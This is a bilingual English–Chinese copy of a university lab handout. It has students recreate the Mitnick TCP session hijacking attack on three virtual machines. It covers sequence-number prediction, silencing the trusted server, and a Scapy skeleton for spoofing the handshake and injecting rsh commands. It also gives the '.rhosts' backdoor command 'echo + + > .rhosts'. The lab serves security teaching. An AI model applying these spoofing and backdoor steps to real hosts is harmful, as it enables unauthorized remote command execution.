米特尼克攻击实验

官方原文档

The Mitnick Attack Lab

米特尼克攻击实验

1.Overview（概览）

Kevin Mitnick is probably one of the most well-known hackers in USA. He was on FBI’s wanted list of criminals（犯罪分子）. While on the run, he became interested in hacking cellular（细胞） phone networks, and was in need for specialized software that could help him do that. That led him to Tsutomu Shimomura, a researcher working at the San Diego Supercomputer Center, who was one of the leading researchers on the security of cellular phone networks. He had the code that Mitnick wanted.

凯文·米特尼克可能是美国最为著名的黑客之一，他的名字被列入联邦调查局的通缉犯名单中。在他逃跑期间，他对入侵手机网络产生了兴趣，并且他需要一个特殊的软件以帮助他来完成这些工作。这让他找到了下村努（日裔美籍的电脑安全专家、计算物理学专家，2008年诺贝尔化学奖得主下村修的儿子），一名工作于圣地亚哥超级计算中心的研究员，他是在移动手机网络安全的领先研究员之一。他拥有米特尼克所想要的代码。

In 1994, Mitnick successfully launched（发射，开展） an attack on Shimomura’s computer, by exploiting（利用） the vulnerabilities（Vulnerability漏洞） in the TCP protocol and the trusted relationship between two of Shimomura’s computers. The attack triggered a dramatic（戏剧性地） showdown（引发了一场激烈的决斗） between the two people, and it eventually（终究） led to the arrest of Mitnick. The showdown was turned into books and Hollywood movies later. The attack is now known as the Mitnick attack, which is a special type of TCP session hijacking（劫持）.

1994年，米特尼克利用TCP协议中的漏洞以及下村努的两台计算机之间的信任关系，成功在下村努的电脑上发起了攻击。这次攻击引发了两个人之间的激烈对决，最终导致米特尼克被捕。这次对决之后被载入书籍和好莱坞电影中。这次攻击现在被称为米特尼克攻击，是TCP会话劫持的一种特殊类型。

The objective of this lab is to recreate the classic Mitnick attack, so students can gain the firsthand experience on such an attack. We will emulate（仿真） the settings that was originally on Shimomura’s computers, and then launch the Mitnick attack to create a forged（伪造的） TCP session between two of Shimomura’s computers. If the attack is successful, we should be able to run any command on Shimomura’s computer. This lab covers the following topics:

此次实验的目标是重建这次经典的米特尼克攻击， 让学生获得类似攻击的一手经验。我们将模拟在下村努电脑上的原始设置，并在下村努的两台电脑之间发起米特尼克攻击来创建伪造的TCP会话。如果攻击成功，我们将可以在下村努的电脑上执行任意命令。该实验覆盖以下主题：

• TCP session hijacking attack

• 会话劫持攻击

• TCP three-way handshake protocol

• TCP三次握手协议

• Remote shell（缩写rsh）

• 远程shell

• Packet sniffing and spoofing

• 数据包的监听和嗅探

  
  

Readings and related topics. Detailed coverage of the TCP session hijacking attack can be found in the SEED book, Computer Internet Security: A Hands-on Approach, 2nd Edition, by Wenliang Du.

阅读资料和相关主题：关于TCP会话劫持攻击的相关细节可以在由杜文亮教授编著的《计算机互联网安全：动手方法》第二版中找到。

Lab environment. This lab has been tested on our pre-built Ubuntu 16.04 VM, which can be downloaded from the SEED website. The lab requires three VMs.

实验环境：该实验已经在我们预创建的Ubuntu 16.04 VM上做过测试，镜像可以在SEED网站上进行下载。该实验需要使用3台虚拟机。

2.How the Mitnick Attack Works

米特尼克攻击过程

The Mitnick attack is a special case of TCP session hijacking attacks. Instead of hijacking an existing TCP connection between victims A and B, the Mitnick attack creates a TCP connection between A and B first on their behalf, and then naturally hijacks the connection.

米特尼克攻击是TCP会话劫持攻击中的一个特殊案例。它关注于劫持在被害者主机A和B之间存在的TCP链接，米特尼克攻击首先在A、B之间创建一个TCP链接，然后自然的劫持该链接。

In the actual Mitnick attack, host A was called X-Terminal, which was the target. Mitnick wanted to log into X-Terminal and run his commands on it. Host B was a trusted server, which was allowed to log into X-Terminal without a password. In order to log into X-Terminal, Mitnick had to impersonate（模拟） the trusted server, so he did not need to provide any password. Figure 1 depicts（描述） the high-level picture of the attack. There are four primary steps in this attack.

在实际的米特尼克攻击中，主机A被称为X终端的目标。米特尼克想登录X终端并在上面执行他的命令。主机B是一台受信任的服务器，它被允许不需要输入密码就能登录到X终端。为了登录到X终端，米特尼克必须模拟受信任的服务器，以不需要提供任何密码。图一描述了该攻击的高级场景，攻击主要包含4步。

Step 1: Sequence number prediction（预测）. Before the attack, Mitnick needed to learn the pattern of the initial sequence numbers (ISN) on X-terminal (in those days, ISNs were not random). Mitnick sent SYN requests to X-terminal and received SYN+ACK responses, then he sent RESET packet to X-Terminal, to clear the half-open connection from X-Terminal’s queue (to prevent the queue from being filled up). After repeating this for twenty times. He found there was a pattern between two successive（连续的） TCP ISNs. This allowed Mitnick to predict ISNs, which was essential（必要） for the attack.

步骤1：序列号预测。在攻击前，米特尼克需要了解在X终端上的初始序列号（ISN）的模式。在当时，初始序列号并非随机产生。米特尼克发送SYN请求给X终端，并且接收SYN+ACK的回应，然后他发送RSESET包给X终端以清除来自X终端队列的半开放连接（用来防止队列被填满）。在重复20次后，他发现在两个连续的TCP初始序号间有一个模式。这使得米特尼克可以预测ISN号，这对于攻击是很有必要的。

Step 2: SYN flooding attack on the trusted server. To send a connection request from the trusted server to X-Terminal, Mitnick needed to send out a SYN packet from the trusted server to X-Terminal. X-Terminal would respond with a SYN+ACK packet, which was sent to the trusted server. Since the trusted server did not actually initiate the request, it would send a RESET packet to X-Terminal, asking X-Terminal to stop the 3-way handshake. This behavior caused trouble to the Mitnick attack.To solve this problem. Mitnick had to silence（安静） the trusted server. Therefore, before spoofing, Mitnick launched a SYN flooding attack on the server. Back then（那时）, operating systems were far more vulnerable（易受攻击的） to the SYN flooding attack. The attack could actually shut down the trusted computer, completely silencing it.

步骤2：在受信服务器上发起SYN泛洪攻击。为了从受信服务器发送连接请求到X终端，米特尼克需要从受信服务器发出一个SYN包给X终端。X终端将会回应一个SYN+ACK包，这个报文将会被送到受信服务器上。一旦受信服务器没有真的初始化过这个请求，它将发送RESET包给X终端，要求X终端停止3次握手。这个行为操作会导致米特尼克攻击出现问题。为了解决该问题，米特尼克需要使受信服务器保持沉默。因此，在欺骗前，米特尼克在服务器上发起SYN泛洪攻击。那时的操作系统更容易受到SYN泛洪攻击。攻击可能会导致受信服务器关机，实现使服务器沉默。

Step 3: Spoofing a TCP connection. Mitnick wanted to use rsh (remote shell) to run a backdoor command on X-Terminal; once the backdoor was setup, he could then log into X-Terminal. To run a remote shell on X-Terminal, Mitnick needed to pass the authentication, i.e, he needed to have a valid account on X-Terminal and know its password. Obviously（明显的）, he did not have that.

步骤3：伪造TCP连接。米特尼克想要使用rsh（远程shell）来运行在X终端上的后门命令行；一旦后门建立，他可以登录到X终端上。为了在X终端上运行一个后门，米特尼克需要通过身份认证等等操作，他需要在X-Terminal上拥有一个有效的帐户并知道其密码。很明显，他根本没有这些。

Shimomura often needed to log into X-Terminal from the trusted server. To avoid typing passwords each time, he added some information in the .rhosts file on X-Terminal, so when he logged into X- Terminal from the trusted server, no password would be asked. This was quite a common practice（实践） back then. With this setup, without typing any password, Shimomura could run a command on X-Terminal from the trusted server using rsh, or run rlogin to log into X-Terminal. Mitnick wanted to exploit（利用） this trusted relationship.

下村努经常需要从受信服务器上登录到X终端。为了避免每次登录都需要输入密码，他添加了一些信息到X终端的.rhosts文件，那么当他从受信服务器登录X终端时，无需要求使用密码。在那时，这是一个常用的命令操作。一旦完成该设置，无需输入密码，下村努就可以从受信服务器上使用rsh来运行在X终端上的命令或是允许rlog来登录到X终端。米特尼克想利用该受信关系。

He needed to create a TCP connection between the trusted server and X-Terminal, and then run rsh inside this connection. He first sent a SYN request to X-Terminal, using the trusted server’s IP as the source IP address. X-Terminal then sent a SYN+ACK response to the server. Since the server had been shut down, it would not send RESET to close the connection.

他需要在受信服务器和X终端上创建一个TCP连接，然后在该连接下运行rsh。他首先发送一个SYN请求给X终端，使用受信服务器的IP作为源IP地址。X终端将会发送SYN+ACK回应给服务器。一旦服务器处于关机状态，它将不会发送RESET包来关闭这个连接。

To complete the three-way handshake protocol, Mitnick needed to spoof an ACK packet, which must acknowledge the sequence number in X-Terminal’s SYN+ACK packet. Unfortunately, the SYN+ACK response only went to the trusted server, not to Mitnick, he could not see the sequence number. However, because of the prior（事先） investigation（调查）, Mitnick was able to predict what this number was, so he was able to successfully spoof the ACK response sent to X-Terminal to complete the TCP three-way handshake.

为了完成3次握手，米特尼克需要伪造一个ACK包，该报文必须知道在X终端发出的SYN+ACK包的序列号。不幸的是，SYN+ACK回应仅会发送给受信服务器，而不会给米特尼克，所以他不知道该序列号是多少。然而，因为做了事先调查，米特尼克可以预测该序号会是多少，所以他可以成功伪造一个ACK回应包发送给X终端，以完成TCP的三次握手。

Step 4: Running a remote shell. Using the established TCP connection between the trusted server and X-Terminal, Mitnick could send a remote shell request to X-terminal, asking it to run a command. Using this command, Mitnick wanted to create a backdoor on X-Terminal so that he could get a shell on X-Terminal anytime without repeating the attack.

步骤4：运行远程shell。使用在受信服务器和X终端之间建立好的TCP连接，米特尼克可以发送远程shell请求给X终端，要求它执行命令。使用这个命令，米特尼克想要在X终端上创建一个后门，那么他将可以不再重复该攻击就可以在任意时刻获取到X终端的shell。

All he needed to do was to add “+ +” to the .rhosts file on X-Terminal. He could achieve that by executing the following command using rsh on X-Terminal: “echo + + > .rhosts”. Since rsh and rlogin program used .rhosts file for authentication, with this addition, X-Terminal would trust every rsh and rlogin request from anyone.

所有他需要做的就是在X终端上的.rhosts文件中添加上“+ +”。他可以通过在X终端上使用rsh执行以下命令来实现这一点：“ echo + +> .rhosts”。由于rsh和rlogin程序使用.rhosts文件进行身份验证，因此，X终端将信任任何人的每个rsh和rlogin请求。

3.Lab Setup（实验设置）

We need to use three VMs for this lab. One for X-Terminal, one for the trusted server, and one the attacker. In the real Mitnick attack, the attacker machine is a remote machine. In this lab, for the sake（缘故） of simplicity, we put all these three VMs on the same network.

在该实验中，我们需要使用3台虚拟机。一台作为X终端，一台作为受信服务器，另一台作为攻击者。在真实的米特尼克攻击中，攻击者机器是一台远端主机。在该实验中，为了简单起见，我们使这三台虚拟机都同处于一个网络中。

3.1 Installing the rsh program

The remote shell rsh is a command line program that can execute shell commands remotely. Although we will use rsh in this task, we should know that rsh and rlogin programs are not secure, and they are not used any more. They have been replaced by more secured programs, such as ssh. That is why in the modern Linux operating systems, the rsh command is actually a symbolic link to the ssh program. See the following

3.1 安装rsh程序

远程shell rsh是一个命令行程序，可以远程执行shell命令。尽管我们在这个实验中使用rsh，我们应该要知道rsh和rlogin程序是不安全的，并且已经不再被使用。他们已经被更安全的程序所替代，例如ssh。这就是为什么在现代Linux操作系统下，rsh命令实际上是ssh程序的符号链接。参考如下

$ ls -al /etc/alternatives | grep rsh
lrwxrwxrwx	1 root root	12 Jul 25	2017 rsh -> /usr/bin/ssh

To recreate the Mitnick attack, we need to install the unsecure version of the rsh program. Obviously, the old version of the rsh no longer works, but an open-source project reimplements the remote shell clients and servers. It is called rsh-redone. Currently, it has not been installed in our VM yet, so we will use the following commands to install rsh server and client on all three VMs.

为了创建米特尼克攻击，我们需要安装rsh程序的不安全版本。很明显，旧版本的rsh不再起作用，但是一个开源项目重新实现了远程Shell客户端和服务器。该项目被称为rsh重现。当前，它并没有被安装在我们的虚拟机中，我们将在三台虚拟机中使用以下命令安装rsh服务器和客户端。

$ sudo apt-get install rsh-redone-client
$ sudo apt-get install rsh-redone-server

3.2 Configuration配置

The rsh server program uses two files for authentication, .rhosts and /etc/hosts.equiv. Every time the server receives a remote command request, it will check the/etc/hosts.equiv. If the request comes from a hostname stored in the file, the server will accept it without asking for passwords. If /etc/hosts.equiv does not exist or do not have that hostname, rsh will check the .rhosts file on the user’s home directory.

rsh服务器程序使用两个文件用来做认证，.rhosts*和/etc/hosts.equiv。每当服务器接收到一个远程命令请求，它将检测/etc/hosts.equiv文件。如果请求来自于在文件中所存储的主机名，则服务器将接受它并无需要求使用密码。如果/etc/hosts.equiv文件不存在，或是在文件中不包含主机名，那么rsh将检测在用户home目录下的.rhosts*文件。

Shimomura often needed to run remote commands on X-Terminal from the trusted server. To avoid typing passwords, he created a .rhosts file on host X-Terminal and put the trusted server’s IP address into the file. Note that the .rhosts file must reside（居住） at the top level of a user’s home directory and can be written only by the owner/user. Use the following commands on X-Terminal to do the setup.

下村努经常需要在受信服务器上远程到X终端上运行远程命令。为避免输入密码，他在X终端上创建了一个.rhosts文件并且在文件中存放了受信任服务器的IP地址。注意 .rhosts文件必须放置在用户家目录的顶层并且只能被文件所有者/用户所写入。在X终端上使用如下命令可以完成设置。

$ touch .rhosts
$ echo  [Server’s IP address] > .rhosts
$ chmod  644 .rhosts

To verify your configuration, try running the following command on the trusted server.

为确认你的配置，请尝试在受信服务器上运行如下命令。

rsh [X-Terminal’s IP] date

If the command prints the current date and time, your configuration is working now. If you see “Authentication Failure”, something in your setup may not be correct. One of the common mistakes is the permission on the .rhosts file: you should make sure it is only writable to the owner.

如果该命令打印出了当前日期和时间，则你的配置正在运行。 如果你看到了“身份验证失败”的提示，则说明你的设置可能不正确。 常见错误之一是对.rhosts文件的许可：你应确保该文件仅对所有者可写。

Allow all. To allow users to execute commands on X-Terminal from all IP addresses, we just need to put two plus signs (“+ +”) in the .rhosts file. This is very dangerous, and nobody should do that. But if you are an attacker, this is a convenient way to set up a backdoor. As we have mentioned（提到） before, this is what has been used in the Mitnick attack.

允许所有。为了允许任意IP地址用户在X终端上执行命令，我们仅需输入2个+符号（“++”）到rhosts文件中。这个操作很危险，任何人都不应该做该操作。但如果你是一名攻击者，这是一个设置后面的方便方法。正如我们之前提到的，这就是在米特尼克攻击中所使用到的。

4.Task 1: Simulated SYN flooding （模拟SYN泛洪）

The operating systems at the time of the Mitnick Attack were vulnerable（易受攻击的） to SYN flooding attacks, which could mute（无声） the target machine or even shut it down. However, SYN flooding can no longer cause such a damage for modern operating systems. To simulate this affect, we will disconnect the trusted server from the network, so it is completely “muted”. Click on the network icon（图标） on the upper right corner（角落） of the desktop, and choose Disconnect.

在发生米特尼克攻击时，操作系统容易受到SYN的泛洪攻击，这将使目标主机无法回应甚至使得主机关机。然而，SYN泛洪攻击对于现代操作系统而言将不会造成这么严重的伤害。为了模拟该影响，我们将断开在网络中的受信任主机，受信主机将保持“沉默”。单击桌面右上角的网络图标，然后选择断开连接。

When X-Terminal receives a SYN packet from the trusted server, it will respond with a SYN+ACK packet. Before sending out this packet, it needs to know the MAC address of the trusted server. The ARP cache will be checked first. If there is no entry for the trusted server, X-Terminal will send out an ARP request packet to ask for the MAC address. Since the trusted server has been muted, no one is going to answer the ARP request, hence（于是） X-Terminal cannot send out the response. As a result, the TCP connection will not be established.

当X终端从受信任服务器收到一个SYN包，它将回应一个SYN+ACK包。在发送这个包前，它需要知道受信任主机的MAC地址。X终端首先检查ARP缓存。如果没有受信任服务器的条目，X终端将发送ARP广播请求报文来获取其MAC地址。一旦受信任服务器处于“沉默”状态，没有主机回应这个ARP广播请求，那么X终端将无法发送回应。最终TCP连接无法建立。

In the real attack, the trusted server’s MAC address was actually in X-Terminal’s ARP cache. Even if it was not, before silencing the trusted server, we could simply spoof an ICMP echo request from the trusted server to X-Terminal, that would trigger X-Terminal to reply to the trusted server, and hence would get the trusted server’s MAC address, and save it to the cache.

在真实攻击中，受信服务器的MAC地址是在X终端的ARP缓存中的。即使不是，在使受信任的服务器沉默之前，我们也可以简单地伪造一份ICMP回显请求从受信任的服务器发往X终端，这将触发X终端答复受信任的服务器，从而获得受信任的服务器的MAC 地址，并将其保存到缓存中。

To simplify the task, before disconnecting the trusted server, we will simply ping it from X-Terminal once, and then use the arp command to check and make sure that the MAC address is in the cache. It should be noted that cache entry may be deleted by the operating system if the OS fails to reach a destination using the cached MAC address. To simply your attack, you can run the following command on X-Terminal to permanently（永久的） add an entry to the ARP cache:

为简化任务，在断开受信服务器前，我们将简单从X终端上ping它，然后使用arp命令来检查并确保MAC地址保存在缓存中。应该注意的是，如果操作系统无法使用缓存的MAC地址到达目的地，则缓存条目可能会被操作系统删除。为简化你的攻击，你将在X终端上运行如下命令来给ARP缓存永久添加一个条目：

$ sudo arp -s [Server’s IP] [Server’s MAC]

5.Task 2: Spoof TCP Connections and rsh Sessions（伪造TCP连接和rsh会话）

Now that we have “brought down” the trusted server, we can impersonate the trusted server, and try to launch a rsh session with X-Terminal. Since rsh runs on top of TCP, we first need to establish a TCP connection between the trusted server and X-Terminal, and then run the rsh in this TCP connection.

现在我们已经关闭了受信服务器，我们可以模仿受信服务器，并且尝试和X终端发起rsh会话。rsh运行在TCP之上，我们需要在受信服务器和X终端上建立一个TCP连接，并且在这个连接上运行rsh。

One of the difficulties in the Mitnick attack is to predict the TCP sequence numbers. It was possible back then when TCP sequence numbers were not randomized. However, modern operating systems now randomize their TCP sequence numbers (as a countermeasure（对策） against TCP session hijacking attacks), so predicting the numbers becomes infeasible（不可行的）. To simulate（模拟） the situation of the original Mitnick attack, we allow students to sniff packets, so they can get the sequence numbers, instead of guessing them.

米特尼克攻击的难点之一在于预测TCP序号。那时有可能没有对TCP序列号进行随机分配。然而在现代操作系统中目前TCP序号是随机的（作为对抗TCP会话劫持攻击的对策），所以预测序列号变得不再可行。为了模拟原始的米特尼克攻击状况，我们允许学生伪造数据包，他们可以获取到序列号而无需再猜测它。

Restriction. To simulate the original Mitnick attack as closely as we can, even though students can sniff the TCP packets from X-Terminal, they cannot use all the fields in captured packets, because in the real attacks, Mitnick could not sniff packets. When students write their attack programs, they can only use the following fields from the captured packets. Penalty（惩罚，罚款） will be applied if other fields are used.

限制。为了尽可能模拟原始米特尼克攻击，尽管学生能从X终端伪造TCP数据包，但是他们不能使用在捕获到的数据包中的所有字段，因为在真实攻击中，米特尼克无法监听数据包。当学生写下他们的攻击程序，他们仅能使用捕获到的数据包的以下字段参数。如果使用到了其他字段参数信息，将会受到惩罚。

• The TCP sequence number field (this does not include the acknowledgment field).

• TCP序号字段（该字段不包含在确认号ACK字段中）

• The TCP flag field. This allows us to know the types of the captured TCP packets. In the actual Mitnick attack, Mitnick knew exactly what type of packets were sent out by X-Terminal, because they are part of the TCP three-way handshake protocol. We allow students to use this field for task simplification.

• TCP标志字段。该字段允许我们知道捕获的TCP数据包类型。在实际的米特尼克攻击中，米特尼克知道什么样的数据包将被X终端发送出去，因为它们是TCP三次握手中的一部分。为了简化实验，我们允许学生使用这些字段。

• All the length fields, including IP header length, IP total length, and TCP header length. These pieces of information are not necessary for the attacks. In the actual Mitnick attack, Mitnick knew exactly（究竟，恰好） what their values are. We allow students to use these fields for task simplification.

• 所有的长度字段，包括IP首部长度，IP数据报全长和TCP首部长度。对于这次攻击，这些信息没有什么必要。在真实的米特尼克攻击中，米特尼克知道这些值究竟是多少。为了简化实验，我们允许学生使用这些字段。

The behavior of rsh. To create a spoofed rsh session between the trusted server and X-Terminal, we need to understand the behavior of rsh. Let us start a rsh session from Host A to Host B, and then use Wireshark to capture the packets between them. We use the following command to run the date command on Host B from Host A via（通过） the rsh remote shell.

rsh的行为。为了在受信服务器和X终端之间创建一个伪造的rsh会话，我们需要了解rsh的行为。让我们从主机A到主机B之间开始一个rsh会话，然后使用wireshark捕获他们之间的数据包。我们使用以下命令通过rsh远程shell从主机A在主机B上运行date命令。

// On Host A
$ rsh [B’s IP] date

The packet trace in this rsh session is shown in the following. Here 10.0.2.7 is the Host A’s IP address, and 10.0.2.6 is Host B’s IP address. If a packet does not carry（携带） any TCP data, the length information (i.e. Len=0) is omitted.

以下展示了在rsh会话中的数据包追踪。主机A的IP地址是10.0.2.7，主机B的IP地址是10.0.2.6。如果数据包不携带任何TCP数据，那么长度信息（如Len=0）将被忽略。

Listing 1: Packet trace of a rsh session（监听1：rsh会话中的数据包追踪）

#The first connection	
	SRC IP		DEST IP		TCP Header
1	10.0.2.7	10.0.2.6	1023 -> 514 [SYN] Seq=778933536
2	10.0.2.6	10.0.2.7	514 -> 1023 [SYN,ACK] Seq=10879102 Ack=778933537
3	10.0.2.7	10.0.2.6	1023 -> 514 [ACK] Seq=778933537 Ack=10879103
4	10.0.2.7	10.0.2.6	1023 -> 514 [ACK] Seq=778933537 Ack=10879103 Len=20
                            RSH Session Establishment
							Data: 1022\x00seed\x00seed\x00date\x00
5	10.0.2.6	10.0.2.7	514 -> 1023 [ACK] Seq=10879103 Ack=778933557

#The second connection	
6	10.0.2.6	10.0.2.7	1023->1022	[SYN] Seq=3920611526
7	10.0.2.7	10.0.2.6	1022->1023	[SYN,ACK] Seq=3958269143 Ack=3920611527
8	10.0.2.6	10.0.2.7	1023->1022	[ACK] Seq=3920611527 Ack=3958269144

#Going back to the first connection
9	10.0.2.6	10.0.2.7	514 -> 1023 [ACK]Seq=10879103 Ack=778933557 Len=1 Data: \x00
10	10.0.2.7	10.0.2.6	1023 -> 514 [ACK]Seq=778933557 Ack=10879104
11	10.0.2.6	10.0.2.7	514 -> 1023 [ACK]Seq=10879104 Ack=778933557 Len=29 Data: Sun Feb 16 13:41:17 EST 2020

We can observe that a rsh session consists of two TCP connections. The first connection is initiated by Host A (the client). An rshd process on Host B is listening to connection requests at port 514. Packets 1 to 3 are for the three-way handshake protocol. After the connection has been established, the client send rsh data (including user IDs and commands) to the Host B (Packet 4). The rshd process will authenticate the user, and if the user is authenticated, rshd initiates a separate（分开，另外） TCP connection with the client.

我们可以观察在这两个TCP连接下的rsh会话。第一个连接是主机A（客户端）的初始化启动。主机B上的rshd进程在514号端口，正在监听连接请求。数据包1到3是三次握手过程。在连接建立后，客户端发送了rsh数据（包括用户ID和命令）到主机B（数据包4）。rshd进程将认证用户，如果用户通过认证，rshd会与客户端启动一个新的TCP连接。

The second connection is used for sending error messages. In the trace above, since there was no error, the connection was never used, but the connection must be successfully established, or rshd will not continue. Packets 6 to 7 are for the three-way handshake protocol of the second connection.

第二个连接将被用来发送一个错误的信息。在上面的追踪中，如果没有错误，那么连接将永远不会被使用，但是连接必须要成功建立，不然rshd将无法继续。数据包6到7用于第二个连接的三次握手。

After the second connection has been established, Host B will send a zero byte to the client (using the first connection), Host A will acknowledge the packet. After that, rshd on Host B will run the command sent by the client, and the output of the command will be sent back to the client, all via the first connection. Students can use Wireshark to capture a rsh session, and study its behaviors, before launching the Mitnick attack. We divide the attack task into two sub-tasks, each one focusing on one connection.

在第二次连接建立之后，主机B将发送一个0字节给客户端（使用第一个连接），主机A将回应数据包。之后，主机B上的rshd将运行客户端发送的命令，然后命令的输出内容将被送还到客户端，这些数据包都将通过第一个连接。在发起米特尼克攻击前，学生可以使用wireshark来捕获rsh会话并学习其行为。我们拆分这次的攻击任务为两个子任务，每个子任务都关注于一个连接。

We will use Scapy for most of the tasks in this lab. The current version of the SEED VM may not have Scapy installed for Python3. We can use the following command to install Scapy for Pyhon3.

我们将在本次实验中使用scapy来贯穿大部分任务。当前版本的SEED VM可能未安装适用于Python3的Scapy。我们可以使用以下命令来安装Python3。

$ sudo pip3 install scapy

5.1 Task 2.1: Spoof the First TCP Connection（伪造第一个TCP连接）

The first TCP connection is initiated by the attacker via a spoofed SYN packet. As you can see in Figure 2, after X-Terminal receives the SYN packet, it will in turn send a SYN+ACK packet to the trusted server. Since the server has been brought down, it will not reset the connection. The attacker, which is on the same network, can sniff the packet and get the sequence number.

攻击者通过一个伪造的SYN报文对第一个TCP连接初始化。通过图2你可以看到，在X终端接收到SYN包后，它将发送一个SYN+ACK的报文给受信服务器。一旦受信服务器被攻击down掉，它将不会重置该连接。在处于同一网络中的攻击者就可以监听数据包并获取seq号。

Step 1: Spoof a SYN packet. Students should write a program to spoof a SYN packet from the trusted server to X-Terminal (see Packet 1 in Listing 1). There are six standard TCP code bits, and they can be set in the flag field of the TCP header. The following code examples show how to set the flag field and how to check whether certain（某些） bits are set in the flag field.

步骤1：伪造一个SYN包。学生需要写下一个程序来伪造从受信服务器发往X终端的SYN包（查看在监听1表中的数据包1）。有6个TCP的标志位，他们可以在TCP头部中的标志字段中被设置。以下代码展示了如何设置标志字段并且如何检测在标志字段中某些bit被设置。

# 'U': URG bit 
# 'A': ACK bit 
# 'P': PSH bit 
# 'R': RST bit 
# 'S': SYN bit 
# 'F': FIN bit

tcp = TCP()

# Set the SYN and ACK bits 
tcp.flags = "SA"

# Check whether the SYN and ACK are the only bits set 
if tcp.flags == "SA":

# Check whether the SYN and ACK bits are set
if 'S' in tcp.flags and 'A' in tcp.flags:

It should be noted that the source port of the SYN packet must be from port 1023. If a different port is used, rsh will reset the connection after the connection is established. If this step is successful, from Wireshark, we should be able to see a SYN+ACK packet coming out of X-Terminal (see Packet 2 in Listing 1).

有一点需要注意，SYN包中的源端口需要来自于端口1023.如果使用了一个不同的端口，rsh在连接建立后将重置连接。如果这步成功，从wireshark中我们应该可以看到SYN+ACK包将从X终端发送出来（查看监听表1中的2号包）。

Step 2: Respond to the SYN+ACK packet. After X-Terminal sends out a SYN+ACK, the trusted server needs to send out an ACK packet to complete the three-way handshake protocol. The acknowledge number in the packet should be S+1, where S is the sequence number contained in the SYN+ACK packet. See Packet 3 in Listing 1.

步骤2: 响应SYN+ACK数据包。在X终端发送出SYN+ACK后，受信服务器需要发出一个ACK包来完成三次握手过程。在回应包中的S应该要+1，其中S是在SYN+ACK包中的seq号。可以从监听表1中的第三个包看出来。

In the actual Mitnick attack, the attacker could not see the SYN+ACK packet, because it was sent to the trusted server, not to the attacker. That is why Mitnick had to guess the value of the sequence number. In this lab, we allow students to get the sequence number via packet sniffing.

在真实的米特尼克攻击中，攻击者无法获知SYN+ACK包，因为它是发往了受信服务器上，而非发往攻击者。这就是为什么米特尼克需要猜测seq号的值了。在本次实验中，我们允许学生通过数据包监听来获得seq号的值。

Students need to write a sniff-and-spoof program using Scapy and run it on the attacker’s machine. Here is a skeleton（骨架） of a sniff-and-spoof program that might be useful. Please make sure to follow the restrictions（限制） described at the beginning of the section, or you will get a penalty（惩罚，罚款）.

学生需要使用scapy写下一个监听-欺骗程序，并在攻击者的主机上运行该程序。这有一份监听-欺骗程序的大致框架可能会对你有用。请确保你遵循了开头部分的限制描述，否则你将会有惩罚。

#!/usr/bin/python3
from scapy.all import *

x_ip		= "10.0.2.6" 		# X-Terminal
x_port		= 514				# Port number used by X-Terminal

srv_ip		= "10.0.2.7" 		# The trusted server
srv_port	= 1023 				# Port number used by the trusted server

# Add 1 to the sequence number used in the spoofed SYN
seq_num 	= 0x1000 + 1


def spoof(pkt):
	global seq_num 				# We will update this global variable in the function
	
    old_ip	= pkt[IP]
	old_tcp	= pkt[TCP]
    
# Print out debugging information
tcp_len = old_ip.len - old_ip.ihl*4 - old_tcp.dataofs*4 		# TCP data length
print("{}:{} -> {}:{} Flags={} Len={}".format(old_ip.src, old_tcp.sport,old_ip.dst, old_tcp.dport, old_tcp.flags, tcp_len))


# Construct the IP header of the response
ip	= IP(src=srv_ip, dst=x_ip)

# Check whether it is a SYN+ACK packet or not;
# if it is, spoof an ACK packet

# ... Add code here ...
myFilter = ’tcp’ 				# You need to make the filter more specific
sniff(filter=myFilter, prn=spoof)

Step 3: Spoof the rsh data packet. Once the connection is established, the attacker needs to send rsh

data to X-Terminal. The structure（结构体） of the rsh data is shown below.

步骤3：伪造rsh数据包。一旦连接建立成功，攻击者需要发送rsh数据给X终端。rsh数据的结构如下所示。

[port number]\x00[uid_client]\x00[uid_server]\x00[your command]\x00

The data has four parts: a port number, client’s user ID, server’s user ID, and a command. The port number will be used for the second connection (see Task 2.2). Both client and server’s user ID is seed in our VM. The four fields are separated by a byte 0. Note that there is also a byte 0 at the end of the rsh data. An example is given in the following. In this example, we tell X-Terminal that we are going to listen on port 9090 for the second connection and the command we want to run is “touch /tmp/xyz”.

数据有4个部分：端口号，客户端用户ID，服务器用户ID和一个命令。端口号将被用于第二个连接（参考任务2.2）。客户端和服务器的用户ID都是我们VM中的种子。4个字段被字节0分隔开。注意在rsh数据最后也有个字节0.以下给了一个示例，在该例中，我们告诉X终端我们将要在9090端口上为第二个连接进行监听，同时命令字段我们想要执行“touch /tmp/xyz”。

data	= '9090\x00seed\x00seed\x00touch /tmp/xyz\x00'
send(IP()/TCP()/data, verbose=0)

Students should modify the sniff-and-spoof program written in Step 2, so an rsh data packet is sent to X-Terminal (see Packet 4 in Listing 1). If this step is successful, from Wireshark, we can see that X-Terminal is going to initiate a TCP connection to the trusted server’s port 9090, which is the port number specified in our rsh data.

学生需要修改在步骤2写下的监听-欺骗程序，然后一个rsh数据包将会发送给X终端（参考监听表1的数据包4）。如果该步骤成功，从wireshark上我们可以看到X终端将初始化一个连接到受信服务器的9090端口，该端口号是我们在rsh数据中指定的。

In your report, please describe whether the touch command has been executed on X-Terminal or not.Please also include snapshots（快照） of your Wireshark.

在你的报告中，请描述在X终端上touch命令是否有被执行，同时附上你的wireshark截图。

5.2 Task 2.2: Spoof the Second TCP Connection（伪造第二个TCP连接）

After the first connection has been established, X-Terminal will initiate the second connection. This connection is used by rshd to send out error messages. In our attack, we will not use this connection, but if this connection is not established, rshd will stop without executing our command. Therefore, we need to use spoofing to help X-Terminal and the trusted server finish establishing this connection. See Figure 3.

在第一个连接被建立后，X终端将初始化第二个连接。rshd使用此连接发送错误消息。在我们的攻击中，我们不需要使用该连接，但是如果该连接没有被建立，rshd将会停止而不执行我们的命令。因此，我们需要使用伪造来帮助X终端和受信服务器完成建立该连接。参考图3。

Students need to write another sniff-and-spoof program, which sniffs the TCP traffic going to the port 9090 of the trusted server (assuming（假设） 9090 is used in Task 2.1). When it sees a SYN packet, it should respond with a SYN+ACK packet. See Packet 7 in Listing 1 for an example.

学生需要写另外一个监听-欺骗程序，它监听去往受信服务器9090端口的TCP流量（假设在任务2.1中9090端口已被使用）。当它发现一个SYN包，它将回应一个SYN+ACK包。有关示例参考在监听表1的7号包。

If both connections have been successfully established, rshd will execute the command contained in the rsh data packet. Please check the /tmp folder and see whether /tmp/xyz is created and whether its timestamp（时间戳） matches the present time. Please include your evidence in your report.

如果两个连接都被成功建立，rshd将会执行被包含在rsh数据包中的命令。请检测/tmp文件夹并查看是否/tmp/xyz被创建，同时检测时间戳是否和当前时间匹配。请在你的报告中写下你的证据。

